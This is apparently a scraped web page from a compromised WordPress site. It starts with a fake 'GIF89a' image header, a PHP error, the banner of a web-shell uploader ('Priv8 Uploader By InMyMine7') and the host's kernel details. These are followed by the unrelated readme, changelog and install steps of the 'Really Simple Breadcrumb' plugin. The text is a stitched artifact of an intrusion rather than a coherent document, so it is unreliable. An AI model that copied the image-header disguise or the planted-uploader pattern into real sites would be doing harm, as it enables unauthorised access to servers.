GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
=== Really Simple Breadcrumb ===
Contributors: chr1s9r
Donate link: http://www.christophweil.de
Tags: breadcrumb, simple, breadcrumb plugin, breadcrump
Author URI: http://www.christophweil.de
Requires at least: 3.0
Tested up to: 3.9
Stable tag: 1.0.2
This is a simple WP Plugin which lets you use Breadcrumbs for Pages!
== Description ==
This is a really simple WP Plugin which lets you use Breadcrumbs for Pages! Just download the Plugin, put in the correct Folder, as
explained below, use the code shown in the install section and activate it. That simple! If you want to modify the styles use the class .breadcrumb
in your CSS file or navigate to wp-content/plugins/really-simple-breadcrumb/breadcrumb.php and modify the echo output of the function
breadcrumb_css.
== Screenshots ==
1. See the Plugin in Action
== Changelog ==
= 1.0 =
* Changed depth. You can now have 1000 Parentpages.
= 1.0.1 =
* Deleted the hardcoded css. (Apply your own css to .breadcrumb class)
* You can now simply change the separator once in line 17
= 1.0.2 =
* Tested up to 3.9
== Installation ==
This section describes how to install the plugin and get it working.
1. Upload breadcrumb.php to the /wp-content/plugins/really-simple-breadcrumb/ directory.
2. Activate the plugin through the 'Plugins' menu in WordPress
3. Place `<?php if(function_exists(simple_breadcrumb)) {simple_breadcrumb();} ?>` in your page.php template